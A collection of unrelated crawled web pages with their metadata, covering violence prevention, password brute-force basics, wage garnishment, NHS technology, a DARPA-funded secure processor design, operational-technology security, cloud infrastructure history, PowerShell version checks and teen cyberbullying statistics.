<urn:uuid:c2937cae-e3e2-4efe-818a-02fad6fe8b40>
CC-MAIN-2024-38
https://www.kuppingercole.com/research/lc80769/secrets-management
2024-09-18T22:47:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00160.warc.gz
en
0.923535
859
2.96875
3
Burlington/Seattle. New York. New Jersey. Minnesota. Orlando. San Bernardino. Chicago… and on and on. How do communities, states, and nations stop mounting violence? It requires leadership across organizations, communities, states, and nations to actually make changes. Leaders from all levels of government (and organizations too) have been “talking about preventing violence” and “talking about changes” for years, but in reality people are creatures of habit and rarely change until the pains get so bad they have to go from talking about changes to making changes. How much more pain will you and your community allow and endure before you start making changes? What Changes Need to Be Made? Currently we rely on law enforcement to stop violence, but law enforcement personnel are First Responders. Their primary responsibilities are to respond to crimes and violence, minimize the damages and apprehend those evil individuals that have committed a crime or a violent attack. Law enforcement has done a good job responding and apprehending, but First Responders are not First Preventers. Making changes starts with these three changes: First Change: Leaders from organizations, communities, states, and nations must immediately realize First Responders are very different from First Preventers. Second Change: Leaders from organizations, communities, states, and nations must make (not talk about) immediate changes to establish First Preventers and equip First Preventers to stop and prevent violence BEFORE evil and radicalized individuals escalate and execute their plans of violence. Third Change: Leaders from organizations, communities, states, and nations need to realize stopping and preventing violence is not about politics or religion or race… it is about intervening and preventing evil doers from killing and ruining the lives of innocent children and adults. What Is the Difference Between “First Responders and First Preventers”? It is football season so let’s use a football team analogy. First Preventers and First Responders are similar to Offensive Coordinators and Defensive Coordinators on football teams. To be successful, football teams need both Offensive and Defensive Coordinators. Football teams that invest almost 100% of their budget into a Defensive Coordinator and Defensive Players (First Responders) and their training and tools would clearly not be very successful in winning their games. Based on evidence from post-event reports and based on the number of daily headlines involving violence, most organizations and communities are not successfully preventing mounting violence and they are constantly in “defense” mode EVEN THOUGH almost all incidents and tragedies were found to be preventable. The bottom line is this, it is nearly impossible for a “team” to win their “war or game” if their primary option depends on Defensive Coordinators and Defensive Players who, like First Responders, are constantly reacting and responding to the “other side”. Why “First Preventers” Make Sense? Emotionally – 99.9% of people prefer Preventing, yet most organizations and communities do not have First Preventers who are trained and properly equipped to prevent. Financially – The costs associated with Preventing are a fraction of the costs of Responding. AND the costs associated with First Preventers and First Preventer tools are a fraction of the costs of First Responders and First Responder tools and equipment. Evidentially – Evidence overwhelmingly reveals most incidents/tragedies were Preventable because the “pre-incident indicators and pieces of the puzzle” existed BEFORE the incident/tragedy. However, without First Preventers and First Preventer tools, the indicators and pieces of the puzzle were not collected, and not assessed and the dots were not connected BEFORE the incident/tragedy. “Making Changes” Will Stop Violence and Change the World My plea to Mayors, Police Chiefs, Governors, and Leaders of Organizations is this, please take time to understand the difference between First Responders and First Preventers and contact me immediately to discuss how you can take immediate action. Your First Responders are good at what they do, so now you need a Prevention Specialist like me help your organization or community implement a proven First Preventer game plan and proven First Preventer tools to immediately start stopping and preventing violence in your community or your organization. Violence is already bad, and getting worse every day… evidence from prevention failures and prevention successes is overwhelming and clear that preventing violence is possible. Don’t wait until violence gets so bad that it impacts you and impacts the lives of innocent people. And don’t let evil doers and violence change our world, because together we can make changes and change the world in a good way. Evidence reveals violence will not be stopped with more talk and more First Responders… stop and prevent violence with First Preventers who are trained, and equipped, and ready to PREVENT.
<urn:uuid:19b25a9e-b247-4c73-b480-8874eace61aa>
CC-MAIN-2024-38
https://www.awareity.com/2016/09/26/stop-mounting-violence-first-preventers-first-responders/
2024-09-08T01:11:14Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00260.warc.gz
en
0.943624
995
2.765625
3
Password Protection: Brute Force Entry Explained Brute force entry attacks are a growing concern. Learn about these attacks and how to avoid them before you get attacked! We have all heard it before when it comes to passwords. We know to make them long and complicated and not to use common information. But do you know why these rules exist and how to make your password safe from common attacks? Your password is your key to opening the lock into your data. If you have a good key then others will not be able to copy that key. However, too many people use similar keys that make them easy to recreate. Now, you might have password management, but today let's talk about brute force entry. This is a different kind of attack than a socially engineered attack. A social-engineered attack begins with getting information from places like social media. This could become a way to get things like pet’s names, old car information, mother’s maiden name, or other common pieces of security information. This can then be used to guess a password or open security questions and take your data. Brute Force entry, however, is a machine-based attack. Brute Force Entry Attacks Explained So let’s say that you have a lock on your house. Anyone with a key could come up and try to open your lock. The vast majority of those keys won’t work. But if you let 10 million people come up and try their key on your door then the chances of it opening become much higher. This is the idea behind a brute force entry attack. A brute force entry attack is done with a computer program that is about to pound thousands of common password combinations in no time. Imagine that you had a lock for a gate that held a 4 digit combination. This kind of attack is the equivalent of someone entering “0-0-0-0”, then “0-0-0-1”, “0-0-0-2”, and so on until it unlocks. Eventually, after thousands of tries, you will get that lock open. So a computer program will use a common password dictionary, and other uploaded files to try again and again to get into your system. Computers can do this a million times in no time at all, and if you don’t have a limit in password attempts, then it is likely that eventually, the computer will crack it. Brute force attacks are very effective unless you take the right approaches to password protection. Avoiding a Brute Force Attack The best way to avoid a brute force attack is the common password wisdom. - Make a long password - Use a variety of symbols, capitals, etc. - Don’t use real information - Make it complicated or random People are aware of these tips but then still make combinations that are simply too easy. This is why we recommend using a password generator and password manager. Let’s just show an example of a strong and weak password. The weak password will be created by a human and the strong one done by a computer generator. Which one of these passwords do you think is more secure? The first password style is very common. It does reach all the checkmarks of a “safe” password though. It’s 21 characters long, which is a great length, has a couple of capital letters, numbers, and even a symbol. However, compared to the second password, it is easy to see the difference. Both passwords are the same length, and follow the same criteria, but which one do you think will be easier to break? Once again, brute force programs have logs of common password combinations, English words, and more to help them break-in. There is no common combination in the second password, where the first is likely much more common. Password protection is more important than you may realize. It only takes one mistake to have all your data stolen or have your business collapse. This is why you always need to take password protection seriously. Brute force attacks are only one common way that people get into your system. Learn more about common cybersecurity tactics and how to stay safe online!
<urn:uuid:d93bcaae-33e6-44c9-8b22-e58b5a976608>
CC-MAIN-2024-38
https://www.itsasap.com/blog/what-is-brute-force-entry
2024-09-07T23:54:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00260.warc.gz
en
0.951711
877
2.6875
3
What factors determine wage garnishment laws? A) The state where you work B) The state where you live Wage garnishment laws are typically determined by the state where you work rather than where you live. Wage garnishment laws have a significant impact on your income and financial stability. These laws dictate the process by which a creditor can collect a portion of your wages to repay a debt. The state where you work plays a crucial role in determining the specific rules and regulations that govern wage garnishment. Employers are required to abide by the garnishment laws of the state where their business is located. This means that even if you live in a state with lenient garnishment laws, your employer must comply with the regulations in the state where their main operations are based. Factors such as the type of debt, the amount owed, and state-specific regulations can also influence how wage garnishment is carried out. It is essential to understand the garnishment laws in your state to protect your income and assets. Consulting with a legal advisor or financial professional can help you navigate these laws and ensure that your rights are upheld.
<urn:uuid:a6c1b357-4546-4558-9939-438fbbd9ba73>
CC-MAIN-2024-38
https://bsimm2.com/law/garnishment-laws-understanding-the-impact-on-your-income.html
2024-09-09T06:23:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00160.warc.gz
en
0.969197
230
2.765625
3
The original smart device for health comms Now considered a technological relic of the 1980s, the role pagers played across the NHS was nothing short of transformational. The relationship between pager and clinician is a long standing one too. According to the Department of Health and Social Care, in 2019 the NHS was still using around 130,00 pagers before being phased out completely. Janine Thomas: When I started nursing in 1990 the use of bleeps was standard practice. No one had a smartphone, and it was later still before consultants carried them around – in fact, it was still rare in the late 00s. Pagers were useful because it meant you could get someone to see your patient more quickly and ask questions too. Of course, there was always chaos at doctors’ rotation because all of a sudden everyone had new numbers. As a nurse in charge of post-op patients, pagers were really a godsend. If you needed to act at speed, if someone was deteriorating, a quick call to the switchboard would usually get you a timely response or a visit to the ward. Fiona Kirk: It surprises many patients to hear that pagers were still being used within the NHS up until a few years ago. Pagers provided a solution to a problem the NHS had, but they were used far beyond their shelf life. The evolution of pagers was always going to be to alerting systems that send a message directly to staff via a mobile device. It helps level up communication, providing the ability to review the alert, see the response, as well as being able to review an audit trail of a clinical scenario. A new generation of old generation technology While some forms of technology, once considered mainstays within the NHS, have been replaced through the fast pace of digital innovation such as pagers and fax machines, others have evolved to take on new life. Take for example the evolution of the once simple alarm between patients and clinicians - the nurse call system. Fiona Kirk: Integrated nurse call systems are an amazing leap forward. They now not only allow a patient to have a two-way conversation with the nursing staff, but they’re also changing how a ward team works. Digital transformation across healthcare has accelerated significantly in the last decade and especially since the Covid-19 pandemic. But what do our clinical consultants feel have been true tech game-changers? Janine Thomas: For me, that’s digital radiology and portable x-ray machines. The benefits are significant; not having to move the patient from the ward and not losing folders and films and being able to process images faster. CPOE (Computerised Physician Order Entry) doing away with forms for tests means the forms aren’t misplaced and they’re legible. I also think that Radio Frequency Identification (RFID) has been really useful in tracking hospital equipment, there’s nothing worse than needing a pump for IVs or a low air loss bed and not being able to locate one. RFID has had some success in improving patient safety too – particularly in high-vulnerability areas like maternity and paediatrics. Fiona Kirk: The use of virtual media for patient appointments and consultations is my game-changer. Patients don’t have to travel to the hospital to wait to be seen and can have a one-to-one chat with a doctor or nurse specialist from their home. It means only those patients who need to be in hospital are – time is used more efficiently for both clinician and patient. Also, the use of virtual meetings for medical and nursing teams within MDTs has evolved and enables many clinicians to discuss a patient, review diagnostic investigations and plan best treatment pathways. This enables prompt treatments with potential improved outcomes, this may also support some of the waiting list challenges in many specialities. Overcoming health-tech hurdles The NHS has a long history of pioneering innovation, but not without having to face a few technological hiccups along the way. We ask Fiona and Janine what they feel are the biggest challenges the NHS needs to overcome. Fiona Kirk: I believe that one of the main challenges the NHS faces is achieving interoperability. The NHS uses a wide range of different systems and technologies, which can make it difficult to share data and information between different departments and organisations. This can hinder progress rather than enable it. Janine Thomas: Solution-focussed digital data workflow between health and social care. There is a bit of a misconception by the public that all the services are joined up and that their information is being shared today in a far more sophisticated way than it is. There are some really great examples of good practice, but there isn’t a standard approach. We should be able to develop apps that help patients and their caregivers see what is happening as they approach discharge, much like we can with hotel booking and airline management systems. Knowing when you are going home, how you are travelling, who will meet you at home, any services that have been put in place, when your appointments will be and if your medication is ready could all streamline the discharge process and drive-up confidence for all.
<urn:uuid:726ff4e7-6e1c-41c4-a3d1-cda12ef9facf>
CC-MAIN-2024-38
https://www.ascom.com/uk/news/blogs/uk-blog/future-health-series-the-tech-thats-transformed-the-nhs/
2024-09-10T11:52:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651241.17/warc/CC-MAIN-20240910093422-20240910123422-00060.warc.gz
en
0.971067
1,071
2.546875
3
Microsoft has announced that its AI-powered reading tutor, Reading Coach, is now available for free to anyone with a Microsoft account. Ai in Education An alarm is sounding from the World Innovation Summit for Education (WISE), an initiative under Qatar Foundation about AI in education. OpenAI said that the company is looking into ways to use its AI chatbot, ChatGPT, in education and the classroom, according to Reuters. AI in education has been a debate topic. Some see it as a chance for personalized learning while others worry about its negative impacts.
<urn:uuid:a8ec0a82-37ec-473e-b5d4-75232f74dcaa>
CC-MAIN-2024-38
https://insidetelecom.com/tag/ai-in-education/
2024-09-14T00:16:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00660.warc.gz
en
0.978403
116
2.5625
3
June 2, 2021 Exploiting memory leaks, injecting code into processes, and a variety of side-channel attacks could become much more difficult to pull off if a technique for creating a "morphable" processor architecture gains widespread adoption. The research effort, known as Morpheus, is a set of architectural changes to processors that implement two protections: the randomization of processor elements critical to program execution and the periodic encryption of those elements, a process called "churn." The first technique allows a processor to change its architecture, forcing attackers to reverse engineer such changes before exploiting a vulnerability. The second technique changes the architecture quickly enough to prevent attackers from successfully reverse engineering its execution. The new architecture could help interrupt the infinite cycle of vulnerability discovery and patching by making vulnerabilities less useful, says Todd Austin, a professor of electrical engineering and computer science at the University of Michigan and a leader of the Morpheus project. "The vast majority of work in the computer-science space is 'how do I find and how do I fix vulnerabilities?'" he says. "We are on the other side. Our technology recognizes that an exploit is different than a vulnerability, so we ask, 'what are the juicy bits that attackers want to get access to after they have found a vulnerability?" — that's pointers, code, address space, organization, and a variety of other things, and those are what we encrypt." The multiuniversity effort, whose team also includes members from Princeton University and the University of Texas at Austin, is part of a program run by the Defense Advanced Research Projects Agency (DARPA) and its System Security Integration Through Hardware and Firmware (SSITH) program. Between last July and October, the SSITH group ran a bug bounty contest — and in keeping with the Star Wars theme, called it Finding Exploits to Thwart Tampering (FETT) — pitting almost 600 hackers against various processor designs. Each platform had to implement the open source processor instruction set RISC-V while running software with known vulnerabilities. The red teams — composed of both government and freelance hackers — did not have to find vulnerabilities but find ways to exploit known vulnerabilities on the hardware platforms. While the attackers found 10 vulnerabilities in various candidate architectures, Morpheus is among the designs that repelled all attacks. "FETT challenged performers and greatly matured the architectures in development," Keith Rebello, the DARPA program manager leading SSITH and FETT initiatives, said in a statement earlier this year. "Several of the research teams were driven to document the use and benefits of their security frameworks in a rigorous and understandable way, which will ultimately help third parties understand and adopt these secure processors for operational use." The researchers noted that attackers will often make use of undefined semantics — places in the program where the behavior of the code is not defined, such as buffer overflows and return-oriented programming. The Morpheus project identified these undefined semantics and created sets, or an ensemble, of moving-target defenses (EMTDs) to protect against them. On a regular basis, then, the processors encrypts the pointers to the EMTDs, essentially creating a new memory architecture about which the attacker has no information — a process called "churn." Originally, the researchers rekeyed every 100 milliseconds, causing significant processor overhead — up to 10%. In the processor created for DARPA test last summer, the researchers extended the churn cycle to seconds, cutting the overhead to less than 2%. "What churn mechanism does is it rekeys all the defenses so that any probing or reverse engineering or side channeling that happens, basically all that progress is lost," he says. "Realistically, unless they are going to mechanize their attacks, it is pretty difficult for a human to work through the problem in under a minute." The researchers have improved their design and will release a second architecture, Morpheus 2, in a future paper. The technology uses an encryption process developed by the National Security Agency known as SIMON, a lightweight block cipher that is specifically intended for Internet of Things devices to run quickly in hardware. While significant controversy has swirled around SIMON and a second cipher, SPECK, after the International Standards Organization (ISO) rejected them in 2018, the use of SIMON in the Morpheus processor design only requires the cipher to protect data for less than a minute, under the current specifications. The proliferation of the Internet of Things devices, which are often not able to run extensive software security code, means that much of the security for these lightweight systems will have to be on the processor. The Morpheus architecture, as well as other processor designs that survived the FETT contest, should protect against exploits such as buffer errors, privilege escalations, resource management attacks, information leakage attacks, numeric errors, code injection attacks, and cryptographic attacks. About the Author You May Also Like How to Evaluate Hybrid-Cloud Network Policies and Enhance Security September 18, 2024DORA and PCI DSS 4.0: Scale Your Mainframe Security Strategy Among Evolving Regulations September 26, 2024Harnessing the Power of Automation to Boost Enterprise Cybersecurity October 3, 202410 Emerging Vulnerabilities Every Enterprise Should Know October 30, 2024 State of AI in Cybersecurity: Beyond the Hype October 30, 2024[Virtual Event] The Essential Guide to Cloud Management October 17, 2024Black Hat Europe - December 9-12 - Learn More December 10, 2024SecTor - Canada's IT Security Conference Oct 22-24 - Learn More October 22, 2024
<urn:uuid:636f52f0-d30d-4336-9931-2787c476c1fc>
CC-MAIN-2024-38
https://www.darkreading.com/iot/processor-morphs-its-architecture-to-make-hacking-really-hard
2024-09-14T01:23:03Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00660.warc.gz
en
0.947523
1,142
3.203125
3
If there’s any certainty in life, aside from death and taxes, it’s that things change. Environments change. Circumstances change. Technologies change. People change. Charles Darwin taught us that change doesn’t always happen quickly, sometimes taking generations to occur. He also concluded that, “it is not the strongest of the species that survives, nor the most intelligent, but the one most responsive to change.” In the world of operational technology - or OT - the ability to respond to change can have existential consequences for us all. These are the networks that monitor and manage our nation’s critical infrastructure, including the operation of industrial equipment and processes - from manufacturing and transportation, to electrical grids and water treatment facilities. OT also plays a key role in the operation of the networks managing our nation’s defense systems. In short, the water we drink, the food we eat, the power we consume, the security we rely on - it’s all possible, in part, due to the use of operational technology. Clearly, there’s a lot riding on our OT networks, so getting it right is imperative, even despite the inevitability of change. But what’s chilling is the fact that historically, OT is an area of technology that has been underserved when it comes to network security due to the assumption that it was "air-gapped," which means disconnected from the rest of the world. While most everyone is familiar with the importance of keeping up on IT security - reminded by the constant headlines of hackers compromising consumer data - not many are aware that OT security vulnerabilities also exist. And when these vulnerabilities are attacked, they do not get reported on by mass media like IT security breaches do. As the IT industry occupies the spotlight, OT exists in the background, invisible to most of us - until the lights suddenly go out, water quality is compromised, supply-chains get disrupted, or much worse. The old adage, “out of sight, out of mind,” couldn’t ring more true when it comes to OT cyber security. It wasn’t until our nation’s largest oil pipeline, the Colonial Pipeline, which carries gasoline and jet fuel to the Southeastern United States, was shut down in 2021 by a cyber attack that the nation woke up to the vulnerabilities that exist within its OT infrastructure. In general, the management of OT network security simply hasn’t kept up with the rise of the Internet of Things (IoT), sensors and remote devices - what many are calling “Industry 4.0”. OT devices that have traditionally been kept separate from the public internet and accessible only by authorized users, can now be controlled and monitored by IT systems or remotely via the internet. While this makes it easier for organizations to operate OT devices and monitor performance, it also potentially exposes the OT network to internet-based attacks. Tom Sego, cofounder and CEO of BlastWave, told VentureBeat that, “IT revolves on a three- to five-year technology-refresh cycle. OT is more like 30 years. Most HMI (human-machine interface) and other systems are running versions of Windows or SCADA systems that are no longer supported, can’t be patched and are perfect beachheads for hackers to cripple a manufacturing operation.” There are fundamental differences between maintaining IT network security and OT network security. IT systems are widely connected, ever changing, and are run using common operating systems such as Windows or MacOS. OT systems are siloed and run autonomously on proprietary software. But the line between IT and OT gets blurred when connected devices and the IoT enter the picture. This is problematic given that there’s very few network administrators that are trained to effectively oversee the security of both OT and IT environments. They’re like unicorns, and many wonder if they even exist. Further compounding the issue is the fact that attacks are happening more frequently. Security Magazine noted that “critical infrastructure is, and will continue to be, highly targeted” by state-sponsored hacker attacks. The publication’s 2022 survey for OT security found that 72 percent of OT operators had been disrupted with a security issue more than five times in a year, but, in general, they couldn’t identify whether the disruptions were caused by IT or OT. The Biden administration recently responded to the rise in attacks, allocating $11 billion toward civilian cybersecurity spending. This is important given that the U.S. has fallen behind other countries that have more fully adopted the technologies and security practices of Industry 4.0, and are already exploring Industry 5.0. As citizens of the U.S., we should all be demanding greater OT security. The world has changed and continues to change - and it’s imperative that the technology operating our nation’s critical infrastructure is prepared for an attack, and has the ability to remain operative when it happens - not if it happens. Robin Berthier is Co-Founder and CEO of Chicago-based Network Perception, a startup dedicated to designing and developing highly-usable network audit solutions. Berthier has over 15 years of experience in the design and development of network security technologies. He received his PhD in the field of cybersecurity from the University of Maryland College Park and served the Information Trust Institute (ITI) at the University of Illinois at Urbana-Champaign as a Research Scientist.
<urn:uuid:e5e34396-a09f-4d71-9a13-4c6b3d49898c>
CC-MAIN-2024-38
https://www.network-perception.com/blog/sleeping-on-ot-cyber-security
2024-09-13T23:48:37Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00660.warc.gz
en
0.954301
1,130
2.546875
3
What is Cloud Infrastructure? The cloud refers to servers or software owned and managed by another business. If it’s hosted in the cloud, it’s hosted on hardware and infrastructure that a third party manages and maintains. Cloud infrastructure, or Infrastructure as a Service (IaaS), refers to all the parts that make up a company’s cloud network. These parts can include: - Hardware — Physical servers that host the information that is put into the cloud. - Processors, memory, and storage — Physical servers are many times split into virtual pieces of compute and storage. - Internet, intranet, and VPNs — Companies can use both public Internet and their own private networks or intranets. - Software and services — Cloud vendors often sell software that sits on top of the hardware, which frequently includes databases, analytics, integration, and management tools. Cloud infrastructure is popular because it provides flexibility and the ability to offer more services to customers, particularly for small and medium organizations. Cloud infrastructure is also easier to maintain and manage than older (or legacy) systems. Maintenance is simple because another company manages, monitors, and maintains the infrastructure. Therefore, it’s easier for a company to implement or get started with a cloud platform. The platform is already built and to use it, you must only create an account. The history of cloud infrastructure Concepts like virtual machines were born in the 1970s and virtual private networks (VPNs — more below) were available in the 1990s. However, the cloud computing of today didn’t really meet its full ideation until 2000. Between 2000 and 2006, companies that survived the dot-com bust needed to modernize their infrastructures. In addition to modernizing infrastructures, cloud allowed companies to do more with less. Businesses no longer had to hire large teams of engineers to deploy and support their infrastructure. Amazon launches AWS In 2006, Amazon moved its online book retail business and all other operations to the cloud and launched Amazon Web Services (AWS). What started as a small leap of ingenuity quickly became the world’s largest provider of cloud-based infrastructure. The open source movement, which made source code of any open-source application free to any developer, also increased cloud popularity. Developers could rapidly deploy open source code on the cloud. Over time, cloud providers like AWS also started offering pre-configured open source software packages. Open-source was attractive to programmers, as it allowed them to modify code in this new era where cloud infrastructure was controlled by the vendor. The open source movement and cloud services, like AWS, grew in both size and popularity. Netflix joined AWS and made millions from subscription-based entertainment in the form of movies and TV shows. User friendly, inexpensive, and convenient, Netflix took over the video rental space in record time. Their subscription base grew to millions quickly. Netflix relied on AWS to support the rapid growth of their streaming business. Soon, companies like Adobe, Samsung, SAP, and Sony also adopted AWS. Cloud goes mainstream In February 2008, Microsoft announced Azure, their own public cloud platform, under the codename of "Project Red Dog." Then in April of that same year, Google launched an App Engine, a precursor to Google cloud. The App Engine allowed users to run their web applications Google infrastructure. In 2010, companies began to provide public cloud offerings as an alternative to AWS. Microsoft launched Window Azure (now Microsoft Azure in February 2010). Rackspace and NASA launched OpenStack, an Open Source Cloud Computing Platform, in July of 2010. Finally, in 2011, Google formally launched Google Cloud Platform. According to Statista, the public cloud computing market grew rapidly after Microsoft and Google joined AWS as competitors in 2008. At that point, the market was valued at $5.82 billion. By 2012, it was valued at $40.96 billion. Gartner research indicates that in 2018 the market was valued at $175 billion, and notes it should total $278 billion in 2021. Today, AWS and Microsoft Azure have the most cloud infrastructure market share. According to Gartner, in 2018 AWS had a 41.5% market share with Microsoft Azure close behind in market share at 29.4%. The remaining cloud infrastructure competitors, including Google Cloud Platform, IBM SoftLayer, Rackspace, and other regional providers like TenCent and Alibaba Cloud, comprise the other 30% of market share. No competitor accounts for more than 3% market share. The rise of SaaS SaaS is closely related to cloud. Technically, it is not considered cloud infrastructure. However, it shares several similarities with cloud infrastructure. Shortly after the growth of AWS and the open source movement, SaaS (software as a service) gained massive popularity. SaaS meant low costs, quick implementation, and accessibility. Users didn't need to manage the hardware and software of an application. Instead, users signed up, logged in via browser, and voila — they’ve got a new software application. Office 365 is the epitome of SaaS. Most people are familiar with the evolution of Office, in all its incarnations. While versions on disk still exist and can be found in basement boxes and the bottoms of office drawers, people access new Office products now via the Internet. Rather than pay for the software once and then pay to upgrade, a subscription fee incorporates upgrades into the service. Instead of needing a new disk to install the latest version of Office 365, employees simply upgrade via their web browser when Microsoft releases a new update. The multiple parts of cloud infrastructure Cloud infrastructure is like physical infrastructures — there are multiple parts that make up a whole. Servers still exist, but they are decoupled from customers. Customers don’t rent servers. Instead, they rent compute, memory, or storage. Routers communicate with the servers and the intranet and Internet. VPNs, which make private networks available via public networks, are added for virtual access to servers, which increase security. Companies, their products, and customers rely on cloud infrastructure Cloud adoption means that a company’s product depends on the uptime, availability, and good performance of cloud products. For example, Netflix depends on Amazon Web Services (AWS) to keep its customers happy. If customers can’t access Netflix, it could be due to an AWS outage. These dependencies don’t stop with cloud providers. With a huge amount of open source and customizable software available via cloud, companies have started integrating different systems into their own applications and products. That means that their customer’s experiences depend on the performance of these third-party systems integrated into their own products. All these integrations and dependencies on cloud solutions make today’s SaaS products more vulnerable to outage and performance issues that directly impact their customers. Preventing cloud infrastructure problems Security, uptime, and backups are top priorities in cloud infrastructure. Investing in an observability strategy is the most efficient way to enhance performance, improve security, and avoid downtime. Since a company’s infrastructure is vital to daily operations, it is essential to get ahead of any potential performance or security issues that would cause downtime or an outage. In order to accomplish this goal, companies must use observability software to catch problems before they impact customers. Digital Experience Observability software tracks and reports on the performance of predetermined pieces of a company’s infrastructure, and provides actionable information for quick issue remediation. To monitor cloud infrastructure, companies need to use a combination of active and passive monitoring to watch user behavior and alert IT admins to potential problems and threats to user experience. Cloud infrastructure includes all the components that make up an organization’s cloud system. These parts can range from hardware like a computer processor or a server for storage to software pieces like a web-development platform. Cloud infrastructure makes it easier for businesses to implement new software, update software, and scale technologies. Digital Experience Observability is vital to the health of cloud infrastructure because cloud infrastructure is so complex, housing numerous different parts, many of which are from multiple third parties. Only a comprehensive observability solution can enable you to quickly discover the source of issues so you can take action before your business is negatively impacted.
<urn:uuid:4cbfc31a-10b7-4aa6-8864-8b083919d1e7>
CC-MAIN-2024-38
https://www.catchpoint.com/glossary/cloud-infrastructure
2024-09-17T19:27:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00360.warc.gz
en
0.945514
1,720
3.40625
3
October 6, 2022 A somewhat odd thing about PowerShell is that it may not be readily apparent which version you are running. Other Microsoft command line environments such as DOS and the Windows Command Prompt show you version information as soon as they launch. This is not the case with PowerShell. In this article, you will learn how to check which PowerShell version you have. Before moving ahead, I want to address one simple question: Why does the PowerShell version even matter? The reason is because newer versions often support cmdlets and syntax rules that simply do not exist in older versions. This is especially true of PowerShell 7.0, which introduced support for parallel operations, ternary operators, pipeline chain operators, and more. Such features do not exist in older PowerShell versions. What Are the Commands to Check the PowerShell Version? The way to check your PowerShell version depends on how you are running it. Checking the PowerShell version on Windows If you are running PowerShell within Windows, here is the primary command for checking your PowerShell version: Get-Host | Select-Object Version As a shortcut, you can instead type: You can see examples of these commands in Figure 1. PowerShell Version 1 Figure 1. There are two different ways that you can check your PowerShell version in Windows. Checking the PowerShell version on Linux Although PowerShell is probably best known as a command line interface for Windows, Microsoft has created a cross platform edition of PowerShell known as PowerShell Core. PowerShell Core is based on .NET Core (as opposed to the full .NET Framework) and supports far fewer cmdlets than Windows PowerShell. The one thing that PowerShell Core has going for it, however, is that it works with non-Windows environments such as Linux. If you are running PowerShell Core on Linux, you can check the PowerShell version by opening the Terminal (if necessary) and entering pwsh --version. (Note that this command is meant to be run from the Linux command line, not from within PowerShell.) You can see what this looks like in Figure 2. PowerShell Version 2 Figure 2. Linux lets you to check the PowerShell version using the pwsh --version command. You can launch PowerShell (assuming that it is installed) by using the pwsh command. Once PowerShell is running, you can check its version by using the same commands used in Windows PowerShell. See Figure 3 for an example. PowerShell Version 3 Figure 3. Once running, you can check the PowerShell version in Linux the same way that you do in Windows PowerShell. What Are the PowerShell Version Numbers? As of publishing this article, these are the existing versions of PowerShell. Upgrade to a New Version of PowerShell So, what happens if you check the PowerShell version and discover that you need a newer version? One option is to run Windows Update. However, Windows Update will not always install the latest version of PowerShell. If you want the most recent PowerShell build, you will have to download it from Microsoft. Microsoft offers different installation options, such as Winget, MSI packages, ZIP files, and even Microsoft Store packages. As such, you can choose the option that works best for your own situation. Based on my experience, the easiest option is to download an MSI package. Just download and then double-click the MSI file. Windows will launch a GUI-based installer like the one shown in Figure 4. PowerShell Version 4 Figure 4. The PowerShell MSI files include a GUI based installer. Checking your PowerShell version isn’t something you will probably do daily, but it is important to know the version you have. As noted above, some PowerShell cmdlets will run only on specific PowerShell versions. Hence, if you are having trouble getting a command to work, you might check to make sure that you are running the required PowerShell version. About the Author You May Also Like
<urn:uuid:00965d4b-a899-42a5-b30b-7286a537a210>
CC-MAIN-2024-38
https://www.itprotoday.com/powershell/how-to-check-your-powershell-version
2024-09-20T07:18:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00160.warc.gz
en
0.901716
798
2.75
3
A report titled Teens, Kindness and Cruelty on Social Networks is shining some light on the dark issue of online bullying. An alarming 88% of teens today have seen cruelty on both Facebook and Twitter. Even worse, 90% of teens opt to ignore cruelty when they see it. Social networking is supposed to bring people together, not drive them apart. I didn’t even have internet when I was in school! I grew up in a time where you had to use a library for research—something many kids today don’t even know how to do. When it came to bullying, it happened in the “good old fashioned way”. In the flesh in all its horrifying glory, complete with emotional scars years later to prove it. That was enough for me. Teens today have the upper hand with technology. Social media is a big part of their lives. For some it is their lives. To “live” means to be online—and they are 24/7. They have smartphones that do everything, they use the cloud as a scapegoat, and they can even learn from home. Mobile and social tech trends are already big name news and both are only going to get bigger in the coming year. Despite how integral social networking is in most teens’ lives, in-person bullying is still the fan favorite for mean kids today. However, the study shows only 19% of teens have been the victim of bullying of any sort. Only 15% said they’ve been targeted solely online. Is that good news? All these stats are great, but what do they really mean? Only 19% of teens being victimized might not seem like a number to be alarmed over, but it is. Bullying is a serious issue and it can really damage someone. Social media can amplify this damage. This report says nothing of the how bad the cruelty was. Name calling? Taunting? Some bad comments on photos or Facebook statuses? How about ongoing public humiliation in front of the whole world to see online? Kids can be cruel and the illusion of anonymity the web gives people seems to fan the fires. With teens committing suicide each and every day from bullying, even 1% is enough to be concerned over. No one needs to die. Social networks shouldn’t condone cruelty, they should prevent it (eg. the It Gets Better network). In the end though, despite the fact 9 out of 10 teens see antisocial behavior online, 78% of them report social media leads to positive outcomes. It doesn’t sound so positive to me. What do you think?
<urn:uuid:ad15eb4a-426a-40c1-8864-dfd0d569249c>
CC-MAIN-2024-38
https://www.faronics.com/news/blog/do-social-networks-lead-to-antisocial-behavior
2024-09-08T03:10:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650958.30/warc/CC-MAIN-20240908020844-20240908050844-00360.warc.gz
en
0.965426
537
2.640625
3
